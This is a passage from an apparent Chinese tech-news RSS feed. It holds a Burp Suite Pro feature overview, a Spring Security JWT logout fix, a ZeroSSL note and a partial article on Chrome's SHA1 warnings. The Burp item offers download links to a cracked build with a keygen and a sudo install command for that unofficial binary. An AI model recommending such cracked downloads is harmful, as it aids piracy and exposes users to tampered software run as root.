discovery function for “invisible” content.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Test for clickjacking attacks&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Generate and confirm clickjacking attacks for potentially vulnerable web pages, with specialist tooling.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Work with WebSockets&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;WebSockets messages get their own specific history - allowing you to view and modify them.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Break HTTPS effectively&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Proxy even secure HTTPS traffic. Installing your unique CA certificate removes associated browser security warnings.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Manually test for out-of-band vulnerabilities&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Make use of a dedicated client to incorporate Burp Suite’s out-of-band (OAST) capabilities during manual testing.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Speed up granular workflows&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Modify and reissue individual HTTP and WebSocket messages, and analyze the response - within a single window.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Quickly assess your target&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Determine the size of your target application. Auto-enumeration of static and dynamic URLs, and URL parameters.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Assess token strength&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Easily test the quality of randomness in data items intended to be unpredictable (e.g. tokens).&lt;/p&gt; &lt;hr&gt;&lt;/hr&gt; &lt;h3&gt;  &lt;a href="https://sysin.org/#Advanced-custom-automated-attacks-&amp;#39640;&amp;#32423;-&amp;#33258;&amp;#23450;&amp;#20041;&amp;#33258;&amp;#21160;&amp;#25915;&amp;#20987;" title="Advanced/custom automated attacks &amp;#39640;&amp;#32423;/&amp;#33258;&amp;#23450;&amp;#20041;&amp;#33258;&amp;#21160;&amp;#25915;&amp;#20987;"&gt;&lt;/a&gt;Advanced/custom automated attacks 高级/自定义自动攻击&lt;/h3&gt; &lt;ul&gt;  &lt;li&gt;Faster brute-forcing and fuzzing&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Deploy custom sequences of HTTP requests containing multiple payload sets. Radically reduce time spent on many tasks.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Query automated attack results&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Capture automated results in customized tables, then filter and annotate to find interesting entries/improve subsequent attacks.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Construct CSRF exploits&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Easily generate CSRF proof-of-concept attacks. Select any suitable request to generate exploit HTML.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Facilitate deeper manual testing&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;See reflected/stored inputs even when a bug is not confirmed. Facilitates testing for issues like XSS.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Scan as you browse&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;The option to passively scan every request you make, or to perform active scans on specific URLs.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Automatically modify HTTP messages&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Settings to automatically modify responses. Match and replace rules for both responses and requests.&lt;/p&gt; &lt;p&gt;  &lt;img alt="Burp Suite Pro Intruder payload positions" src="https://portswigger.net/burp/pro/features/images/payload.png"&gt;&lt;/img&gt;&lt;/p&gt; &lt;hr&gt;&lt;/hr&gt; &lt;h3&gt;  &lt;a href="https://sysin.org/#Automated-scanning-for-vulnerabilities-&amp;#33258;&amp;#21160;&amp;#25195;&amp;#25551;&amp;#28431;&amp;#27934;" title="Automated scanning for vulnerabilities &amp;#33258;&amp;#21160;&amp;#25195;&amp;#25551;&amp;#28431;&amp;#27934;"&gt;&lt;/a&gt;Automated scanning for vulnerabilities 自动扫描漏洞&lt;/h3&gt; &lt;p&gt;  &lt;img alt="Burp Suite Pro scan results" src="https://portswigger.net/burp/pro/features/images/scan-results.png"&gt;&lt;/img&gt;&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Harness pioneering AST technology&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;High signal: low noise. Scan with pioneering, friction-free,   &lt;a href="https://portswigger.net/burp/application-security-testing/oast" rel="noopener" target="_blank"&gt;out-of-band-application security testing (OAST)&lt;/a&gt;.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Conquer client-side attack surfaces&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Hybrid AST and built-in JavaScript analysis engine help to find holes in client-side attack surfaces.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Fuel vulnerability coverage with research&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Cutting-edge scan logic from PortSwigger Research combines with coverage of over 100 generic bugs.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Fine-tune scan control&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Get fine-grained control, with a user-driven scanning methodology. Or, run “point-and-click” scans.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Remediate bugs effectively&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Custom descriptions and step-by-step remediation advice for every bug, from   &lt;a href="https://portswigger.net/research" rel="noopener" target="_blank"&gt;PortSwigger Research&lt;/a&gt;.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Configure scan behavior&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Customize what you audit, and how. Skip specific checks, fine-tune insertion points, and much more.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Navigate difficult applications&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Crawl more complex targets. Burp Suite’s crawler identifies locations based on content - not just URL.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Effectively apply IAST&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Source identification and vulnerability reporting simplified, with optional code instrumentation.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Experience browser-driven scanning&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Browser-driven scanning is already striding toward better coverage of tricky targets like AJAX-heavy single page apps.&lt;/p&gt; &lt;hr&gt;&lt;/hr&gt; &lt;h3&gt;  &lt;a href="https://sysin.org/#Productivity-tools-&amp;#29983;&amp;#20135;&amp;#21147;&amp;#24037;&amp;#20855;" title="Productivity tools &amp;#29983;&amp;#20135;&amp;#21147;&amp;#24037;&amp;#20855;"&gt;&lt;/a&gt;Productivity tools 生产力工具&lt;/h3&gt; &lt;ul&gt;  &lt;li&gt;Deep-dive message analysis&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Show follow-up, analysis, reference, discovery, and remediation in a feature-rich HTTP editor.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Utilize both built-in and custom configurations&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Access predefined configurations for common tasks, or save and reuse custom configurations.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Multiply project options&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Auto-save all working projects to disk, and add configurations to pre-saved projects.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Make code more readable&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Automatically pretty-print code formats including JSON, JavaScript, CSS, HTML, and XML.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Easily remediate scan results&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;See source, discovery, contents, and remediation, for every bug, with aggregated application data.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Simplify scan reporting&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Customize with HTML/XML formats. Report all evidence identified, including issue details.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Speed up data transformation&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Decode or encode data, with multiple built-in operations (e.g. Hex, Octal, Base64).&lt;/p&gt; &lt;p&gt;  &lt;img alt="Burp Suite Pro pretty-printing" src="https://portswigger.net/burp/pro/features/images/pretty-print.png"&gt;&lt;/img&gt;&lt;/p&gt; &lt;hr&gt;&lt;/hr&gt; &lt;h3&gt;  &lt;a href="https://sysin.org/#Extensions-&amp;#25193;&amp;#23637;" title="Extensions &amp;#25193;&amp;#23637;"&gt;&lt;/a&gt;Extensions 扩展&lt;/h3&gt; &lt;p&gt;  &lt;img alt="PortSwigger BApp Store" src="https://portswigger.net/burp/pro/features/images/bapp-store.png"&gt;&lt;/img&gt;&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Create custom extensions&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Extender API ensures universal adaptability. Code custom extensions to make Burp work for you.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Logger++&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;For in-depth vulnerability detail, ordered and arranged in an easily accessible table, make use of   &lt;a href="https://portswigger.net/bappstore/470b7057b86f41c396a97903377f3d81" rel="noopener" target="_blank"&gt;Logger++&lt;/a&gt;.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Autorize&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;When testing for authorization vulnerabilities, save time and perform repeat requests with   &lt;a href="https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f" rel="noopener" target="_blank"&gt;Autorize&lt;/a&gt;.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Turbo Intruder&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Configured in Python, with a custom HTTP stack,   &lt;a href="https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988" rel="noopener" target="_blank"&gt;Turbo Intruder&lt;/a&gt; can unleash thousands of requests per second.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;J2EE Scan&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Expand your Java-specific vulnerability catalogue and hunt the most niche bugs, with   &lt;a href="https://portswigger.net/bappstore/7ec6d429fed04cdcb6243d8ba7358880" rel="noopener" target="_blank"&gt;J2EEScan&lt;/a&gt;.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Access the extension library&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;The   &lt;a href="https://portswigger.net/bappstore" rel="noopener" target="_blank"&gt;BApp Store&lt;/a&gt; customizes and extends capabilities. Over 250 extensions, written and tested by Burp users.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Upload Scanner&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Adapt Burp Scanner’s attacks by uploading and testing multiple file-type payloads, with   &lt;a href="https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa" rel="noopener" target="_blank"&gt;Upload Scanner&lt;/a&gt;.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;AuthMatrix&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Run   &lt;a href="https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e" rel="noopener" target="_blank"&gt;AuthMatrix&lt;/a&gt; with Autorize to define your access-level vulnerability authorization check.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Param Miner&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Quickly find unkeyed inputs with   &lt;a href="https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943" rel="noopener" target="_blank"&gt;Param Miner&lt;/a&gt; - can guess up to 65,000 parameter names per second.&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;Backslash Powered Scanner&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Find research-grade bugs, and bridge human intuition and automation, with   &lt;a href="https://portswigger.net/bappstore/9cff8c55432a45808432e26dbb2b41d8" rel="noopener" target="_blank"&gt;Backslash Powered Scanner&lt;/a&gt;.&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://sysin.org/#&amp;#19979;&amp;#36733;&amp;#22320;&amp;#22336;" title="&amp;#19979;&amp;#36733;&amp;#22320;&amp;#22336;"&gt;&lt;/a&gt;下载地址&lt;/h2&gt; &lt;p&gt;官方版本：Professional / Community 2021.10  &lt;br /&gt;  百度网盘链接：  &lt;a href="https://pan.baidu.com/s/1jlqpII0Ibu2jwrk82je3JA" rel="noopener" target="_blank"&gt;https://pan.baidu.com/s/1jlqpII0Ibu2jwrk82je3JA&lt;/a&gt;  提取码：pjtm&lt;/p&gt; &lt;p&gt;本站特别版：今天刚刚发布，需要测试验证后更新。&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;   &lt;p&gt;Burp Suite Pro for macOS    &lt;br /&gt;百度网盘链接：&lt;/p&gt;   &lt;p&gt;集成 keygen，直接运行，无需额外安装 Java    &lt;br /&gt;    &lt;img alt="burp-dmg" src="https://sysin.org/burp-dmg.png"&gt;&lt;/img&gt;&lt;/p&gt;   &lt;p&gt;修复原版图标，Big Sur 图标适配    &lt;br /&gt;    &lt;img alt="burp-icon" src="https://sysin.org/burp-icon.png"&gt;&lt;/img&gt;&lt;/p&gt;   &lt;p&gt;已知问题：首次运行窗口会变得非常小，拖拽，下次启动即可正常。应用程序运行显示的图标是 java 的图标，比较丑陋，因为破解使用 java loader 导致。&lt;/p&gt;&lt;/li&gt;  &lt;li&gt;   &lt;p&gt;Burp Suite Pro for Linux    &lt;br /&gt;百度网盘链接：&lt;/p&gt;   &lt;p&gt;安装：    &lt;code&gt;chmod +x burpsuitepro-linux-2021.10.bin &amp;amp;&amp;amp; sudo ./burpsuitepro-linux-2021.10.bin&lt;/code&gt;&lt;/p&gt;   &lt;p&gt;集成安装、注册和卸载    &lt;br /&gt;    &lt;img alt="burp-install" src="https://sysin.org/burp-install.png"&gt;&lt;/img&gt;&lt;/p&gt;   &lt;p&gt;主界面一览    &lt;br /&gt;    &lt;img alt="burp-main" src="https://sysin.org/burp-main.png"&gt;&lt;/img&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Security macOS Linux HTTP</category>
      <guid isPermaLink="true">https://itindex.net/detail/61867-burp-suite-pro</guid>
      <pubDate>Tue, 02 Nov 2021 10:34:22 CST</pubDate>
    </item>
    <item>
      <title>Spring Security中用JWT退出登录时很容易犯的错</title>
      <link>https://itindex.net/detail/61823-spring-security-jwt</link>
      <description>&lt;p&gt;最近有个粉丝提了个问题，说他在Spring Security中用JWT做退出登录的时无法获取当前用户，导致无法证明“我就是要退出的那个我”，业务失败！经过我一番排查找到了原因，而且这个错误包括我自己的大部分人都犯过。&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://blog.didispace.com/#Session&amp;#20250;&amp;#35805;" title="Session&amp;#20250;&amp;#35805;"&gt;&lt;/a&gt;Session会话&lt;/h2&gt; &lt;p&gt;之所以要说Session会话，是因为Spring Security默认配置就是有会话的，所以当你登录以后Session就会由服务端保持直到你退出登录。只要Session保持住，你的请求只要进入服务器就可以从  &lt;code&gt;ServletRequest&lt;/code&gt;中获取到当前的  &lt;code&gt;HttpSession&lt;/code&gt;，然后会根据  &lt;code&gt;HttpSession&lt;/code&gt;来加载当前的  &lt;code&gt;SecurityContext&lt;/code&gt;。相关的逻辑在Spring Security默认的过滤器  &lt;code&gt;SecurityContextPersistenceFilter&lt;/code&gt;中，有兴趣可以看相关的源码。&lt;/p&gt; &lt;p&gt;而且默认情况下  &lt;code&gt;SecurityContextPersistenceFilter&lt;/code&gt;的优先级是高于退出过滤器  &lt;code&gt;LogoutFilter&lt;/code&gt;的，所以能够保证有Session会话的情况下退出一定能够获取当前用户。&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://blog.didispace.com/#&amp;#26080;Session&amp;#20250;&amp;#35805;" title="&amp;#26080;Session&amp;#20250;&amp;#35805;"&gt;&lt;/a&gt;无Session会话&lt;/h2&gt; &lt;p&gt;使用了JWT后，每次请求都要携带  &lt;code&gt;Bearer Token&lt;/code&gt;并且被专门的过滤器拦截解析之后才能将用户认证信息保存到  &lt;code&gt;SecurityContext&lt;/code&gt;中去。参考Spring Security实战干货教程中的Token认证实现  &lt;code&gt;JwtAuthenticationFilter&lt;/code&gt;，相关逻辑为：&lt;/p&gt; &lt;table&gt;  &lt;tr&gt;   &lt;td&gt;    &lt;pre&gt;// 当token匹配              &lt;br /&gt;if (jwtToken.equals(accessToken)) {     &lt;br /&gt;    // 解析 权限集合  这里     &lt;br /&gt;    JSONArray jsonArray = jsonObject.getJSONArray(&amp;quot;roles&amp;quot;);     &lt;br /&gt;    List&amp;lt;String&amp;gt; roles = jsonArray.toList(String.class);     &lt;br /&gt;    String[] roleArr = roles.toArray(new String[0]);     &lt;br /&gt;     &lt;br /&gt;    List&amp;lt;GrantedAuthority&amp;gt; authorities = AuthorityUtils.createAuthorityList(roleArr);     &lt;br /&gt;    User user = new User(username, &amp;quot;[PROTECTED]&amp;quot;, authorities);     &lt;br /&gt;    // 构建用户认证token     &lt;br /&gt;    UsernamePasswordAuthenticationToken usernamePasswordAuthenticationToken = new UsernamePasswordAuthenticationToken(user, null, authorities);     &lt;br /&gt;    usernamePasswordAuthenticationToken.setDetails(new WebAuthenticationDetailsSource().buildDetails(request));     &lt;br /&gt;    // 放入安全上下文中     &lt;br /&gt;    SecurityContextHolder.getContext().setAuthentication(usernamePasswordAuthenticationToken);     &lt;br /&gt;} else {     &lt;br /&gt;    // token 不匹配     &lt;br /&gt;    if (log.isDebugEnabled()){     &lt;br /&gt;        log.debug(&amp;quot;token : {}  is  not in matched&amp;quot;, jwtToken);     &lt;br /&gt;    }     &lt;br /&gt;    throw new BadCredentialsException(&amp;quot;token is not matched&amp;quot;);     &lt;br /&gt;}     &lt;br /&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;h2&gt;  &lt;a href="https://blog.didispace.com/#&amp;#20026;&amp;#20160;&amp;#20040;&amp;#36864;&amp;#20986;&amp;#30331;&amp;#24405;&amp;#26080;&amp;#27861;&amp;#33719;&amp;#21462;&amp;#24403;&amp;#21069;&amp;#29992;&amp;#25143;" title="&amp;#20026;&amp;#20160;&amp;#20040;&amp;#36864;&amp;#20986;&amp;#30331;&amp;#24405;&amp;#26080;&amp;#27861;&amp;#33719;&amp;#21462;&amp;#24403;&amp;#21069;&amp;#29992;&amp;#25143;"&gt;&lt;/a&gt;为什么退出登录无法获取当前用户&lt;/h2&gt; &lt;p&gt;分析了两种情况下用户认证信息的安全上下文配置后，我们回到问题的本身。来看看为什么用JWT会出现无法获取当前认证信息的原因。在  &lt;code&gt;HttpSecurity&lt;/code&gt;中，那位同学是这样配置  &lt;code&gt;JwtAuthenticationFilter&lt;/code&gt;的顺序的：&lt;/p&gt; &lt;table&gt;  &lt;tr&gt;   &lt;td&gt;    &lt;pre&gt;httpSecurity.addFilterBefore(jwtAuthenticationFilter, UsernamePasswordAuthenticationFilter.class)     &lt;br /&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;p&gt;我们再看看  &lt;code&gt;Spring Security&lt;/code&gt;过滤器排序图：&lt;/p&gt; &lt;p&gt;  &lt;img alt="Spring Security&amp;#36807;&amp;#28388;&amp;#22120;&amp;#25490;&amp;#24207;" src="https://blog.didispace.com/images/pasted-623.png"&gt;&lt;/img&gt;&lt;/p&gt; &lt;p&gt;也就说LogoutFilter执行退出的时候，JWT还没有被  &lt;code&gt;JwtAuthenticationFilter&lt;/code&gt;拦截，当然无法获取当前认证上下文  &lt;code&gt;SecurityContext&lt;/code&gt;。&lt;/p&gt; &lt;h2&gt;  &lt;a href="https://blog.didispace.com/#&amp;#35299;&amp;#20915;&amp;#26041;&amp;#27861;" title="&amp;#35299;&amp;#20915;&amp;#26041;&amp;#27861;"&gt;&lt;/a&gt;解决方法&lt;/h2&gt; &lt;p&gt;解决方法就是必须在  &lt;code&gt;LogoutFilter&lt;/code&gt;执行前去解析JWT并将成功认证的信息存到  &lt;code&gt;SecurityContext&lt;/code&gt;。我们可以这样配置：  &lt;br /&gt;  &lt;code&gt;httpSecurity.addFilterBefore(jwtAuthenticationFilter, LogoutFilter.class)&lt;/code&gt;  &lt;br /&gt;这样问题就解决了，你只要实现把当前JWT作废掉就退出登录了。&lt;/p&gt; &lt;p&gt;好了，今天的学习就到这里！如果您学习过程中如遇困难？可以加入我们超高质量的  &lt;a href="https://blog.didispace.com/join-group-spring/index.html"&gt;Spring技术交流群&lt;/a&gt;，参与交流与讨论，更好的学习与进步！更多  &lt;a href="http://blog.didispace.com/spring-boot-learning-2x/"&gt;Spring Boot教程可以点击直达！&lt;/a&gt;，欢迎收藏与转发支持！&lt;/p&gt;&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Spring Boot Spring Boot Spring Security JWT</category>
      <guid isPermaLink="true">https://itindex.net/detail/61823-spring-security-jwt</guid>
      <pubDate>Thu, 14 Oct 2021 15:18:00 CST</pubDate>
    </item>
    <item>
      <title>ZeroSSL 也提供免費的 SSL Certificate (DV) 了</title>
      <link>https://itindex.net/detail/61027-zerossl-ssl-certificate</link>
      <description>&lt;p&gt;在   &lt;a href="https://www.facebook.com/"&gt;Facebook&lt;/a&gt; 上被朋友敲可以測   &lt;a href="https://zerossl.com/"&gt;ZeroSSL&lt;/a&gt;，另外一個透過   &lt;a href="https://en.wikipedia.org/wiki/Automated_Certificate_Management_Environment"&gt;ACME&lt;/a&gt; 協定提供免費的 SSL Certificate，不過目前只有支援單一網域名稱 (DV)：「  &lt;a href="https://news.ycombinator.com/item?id=25188614"&gt;Another free CA as an alternative to Let&amp;apos;s Encrypt (scotthelme.co.uk)&lt;/a&gt;」。&lt;/p&gt;
 &lt;p&gt;我先前就有在測 ZeroSSL，不過驗證一直過不去，當時有在   &lt;a href="https://twitter.com/"&gt;Twitter&lt;/a&gt; 上找 ZeroSSL 帳號問，但 ZeroSSL 的人說 ACME 的部份不在客服範圍，就先丟著...&lt;/p&gt;
 &lt;p&gt;剛剛發現是自己耍笨了，原因是   &lt;a href="https://nginx.org/"&gt;nginx&lt;/a&gt; 沒設好造成驗證卡住，一改好後就正常了。&lt;/p&gt;
 &lt;p&gt;用   &lt;a href="https://www.ssllabs.com/"&gt;SSL Labs&lt;/a&gt; 的   &lt;a href="https://www.ssllabs.com/ssltest/analyze.html"&gt;SSL Server Test&lt;/a&gt; 翻了一下，他的 Root CA 看起來歷史更久，應該是有機會解決   &lt;a href="https://letsencrypt.org/"&gt;Let&amp;apos;s Encrypt&lt;/a&gt; 明年會產生的 Root CA 憑證信任問題，也就是先前在「  &lt;a href="https://blog.gslin.org/archives/2020/11/08/9795/lets-encrypt-%E5%9C%A8-android-%E5%B9%B3%E5%8F%B0%E4%B8%8A%E9%81%87%E5%88%B0%E7%9A%84%E5%95%8F%E9%A1%8C/"&gt;Let&amp;apos;s Encrypt 在 Android 平台上遇到的問題&lt;/a&gt;」提到的問題，在   &lt;a href="https://news.ycombinator.com/"&gt;Hacker News&lt;/a&gt; 上的討論也可以看到有人提到這點：&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;Good to know, and I&amp;apos;m glad there&amp;apos;s an alternative to Let&amp;apos;s Encrypt, just in case. Is ZeroSSL trusted by old Android devices? If so, that might be a work-around for Let&amp;apos;s Encrypt&amp;apos;s cross-signing from IdenTrust expiring.&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;不過也有些人有疑慮，畢竟提供這個服務後面的公司幹過不少壞事：&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;If zerossl is reselling/a subsidiary of sectigo, that’s enough reason to never use this.   &lt;br /&gt;
Sectigo is the new name for Comodo. The same bunch of pricks who tried to trademark “Let’s Encrypt”.&lt;/p&gt;
  &lt;p&gt;Other players in the acme cert “business” is great. Renaming a slime ball name and carrying on like nothing happened is not ok.&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;但看起來至少是多了一個選擇...&lt;/p&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Computer Murmuring Network Privacy Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/61027-zerossl-ssl-certificate</guid>
      <pubDate>Tue, 24 Nov 2020 15:11:30 CST</pubDate>
    </item>
    <item>
      <title>HTTPS網站被Chrome打臉？</title>
      <link>https://itindex.net/detail/53244-https-chrome</link>
      <description>&lt;p&gt;接獲報案，某網站的SSL圖示忽然被Chrome打上紅叉叉，https字眼也被劃掉，有種駭客正站在你背後的驚悚感。檢視該網站SSL憑證尚未到期，改用Firefox、IE檢視並無異樣，只有Chrome在連線資訊提及沒有公開稽核記錄、安全性設定已過時、使用過舊密碼編譯法等缺失。&lt;/p&gt;   &lt;div&gt;  &lt;img alt="" src="http://www.darkthread.net/photos/2750-ffa6-o.png"&gt;&lt;/img&gt;&lt;/div&gt;   &lt;p&gt;以上提到的缺失並不算新鮮事。&lt;/p&gt;   &lt;p&gt;公開稽核記錄是指網站經第三方單位稽核無誤，跟花錢取得   &lt;strike&gt;CAS&lt;/strike&gt; ISO認證差不多意思，目的在提升客戶信心。而具備公開稽核記錄的憑證，Chrome或IE還會在地址列標示組織名稱  &lt;strike&gt;以顯尊榮&lt;/strike&gt;，例如：&lt;/p&gt;   &lt;div&gt;  &lt;img alt="" src="http://www.darkthread.net/photos/2751-7711-o.gif"&gt;&lt;/img&gt;&lt;/div&gt;   &lt;p&gt; &lt;/p&gt;   &lt;div&gt;  &lt;img alt="" src="http://www.darkthread.net/photos/2752-5b94-o.gif"&gt;&lt;/img&gt;&lt;/div&gt;   &lt;p&gt;不過，電子商務應用或強調資安的網站較有動機申請第三方稽核提升公信力（畢竟要成本），像是Google、Facebook、YouTube的SSL憑證也都沒有公開稽核記錄。嚴格來說，沒有公開稽核記錄不算缺失。&lt;/p&gt;   &lt;p&gt;至於「安全性設定過時」、「過舊的密碼編譯法」就比較嚴重…&lt;/p&gt;   &lt;p&gt;故事是這樣的（以下會扯到一些密碼學術語，我盡量說人話），現在大家廣泛使用的網頁加密技術（SSL），網站需要具備一張由憑證廠商或組織（CA）簽發的數位憑證（Certificate），數位憑證包含所謂的數位簽章（Signature)。數位簽章會用到一種稱為雜湊（Hash）的演算規則，過去數位憑證採用的雜湊演算法以SHA1為主。依照密碼學，數位簽章有可能被暴力破解、偽造（用電腦不斷嘗試各種組合試出答案），但只要雜湊或加密演算法的強度足夠，即便用全世界最快的電腦也得花上數千上萬年才能破解，就能有效阻擋駭客攻擊，稱得上安全。問題來了，依據  &lt;a href="http://zh.wikipedia.org/wiki/%E6%91%A9%E5%B0%94%E5%AE%9A%E5%BE%8B"&gt;摩爾定律&lt;/a&gt;，電腦每兩年的性能就會提高一倍，於2012年有  &lt;a href="https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html"&gt;研究&lt;/a&gt;指出，依電腦的演進速度，可以預期在幾年之後，SHA1的強度便不足以抵抗新一代電腦的攻擊。意思是只要大爺有錢，在雲端弄一堆機器組成電腦大軍，在短時間內破解數位簽章跟加密並非不可能的事，而花費成本每三年就會降到原來的1/3。很明顯地，SHA1被破解的風險在未來幾年內會逐年升愈高，安全性堪慮。（話雖如此，真要破解仍得花上幾百萬）。&lt;/p&gt;   &lt;p&gt;於是，微軟  &lt;a href="http://blogs.technet.com/b/pki/archive/2013/11/12/sha1-deprecation-policy.aspx"&gt;宣布&lt;/a&gt;從2016年起停用採SHA1演算法的數位憑證，接著Google也跟進，但Google的政策就讓大家有感多了。Chrome瀏覽器開始針對採用SHA1的SSL憑證發出警告，並逐步加重力道！&lt;/p&gt;   &lt;p&gt;Chrome 39版（2014/9）遇到網站使用SHA1憑證時，會在HTTPS鎖頭圖示加註黃三角，Chrome 40版（2014/11）將鎖頭圖示改成白紙，到了Chrome 41版（2015 Q1），鎖頭圖示再次出現，並加上令人驚心的紅叉叉，就是本案例所看到的樣子。[  &lt;a href="http://googleonlinesecurity.blogspot.co.uk/2014/09/gradually-sunsetting-sha-1.html"&gt;參考&lt;/a&gt;]&lt;/p&gt;   &lt;p&gt;這就是原本好好的網站，忽然在Chrome出現紅叉叉鎖頭的原因！隨著客戶端陸續更新Chrome版本，海水一退，就知道哪些網站穿著短褲…&lt;/p&gt;   &lt;p&gt;要解決這個問題很簡單，將SSL憑證換成SHA256版本就好了！而這是網站管理者要煩惱的問題，一般的使用者看到這裡就夠了。&lt;/p&gt;   &lt;p&gt;如果你是網站管理者，SSL憑證到期更新及申請新憑證時，記得要確認取得皂是SHA256版的（但應該也不會有CA再簽發SHA1版了吧？）。若現行的SHA1憑證仍有效，依到期日不同，會有不同的結果，不一定會出現紅叉叉。由於SHA1疑慮屬預防性的警示，較大的風險發生在未來，而且愈晚愈嚴重。故Chrome 41使用以下邏輯判斷憑證的安全程度：&lt;/p&gt;   &lt;p&gt;2016/1/1以前到期的憑證，反正很快要換新成SHA256版，被視為安全。&lt;/p&gt;   &lt;p&gt;2016/1/1-2016/12/31到期憑證，有點危險（因為2016電腦又變快了，攻擊難度下降），標為鎖頭加黃三角。&lt;/p&gt;   &lt;p&gt;2017/1/1以後到期的憑證，遇上的電腦就更凶狠了，故標示為鎖頭加紅叉叉。&lt;/p&gt;   &lt;div&gt;  &lt;img alt="" src="http://www.darkthread.net/photos/2753-f4f3-l.jpg"&gt;&lt;/img&gt;&lt;/div&gt;   &lt;p&gt;以上是網友佛心製作的SSL憑證檢查工具（  &lt;a href="http://sha1affected.com/" 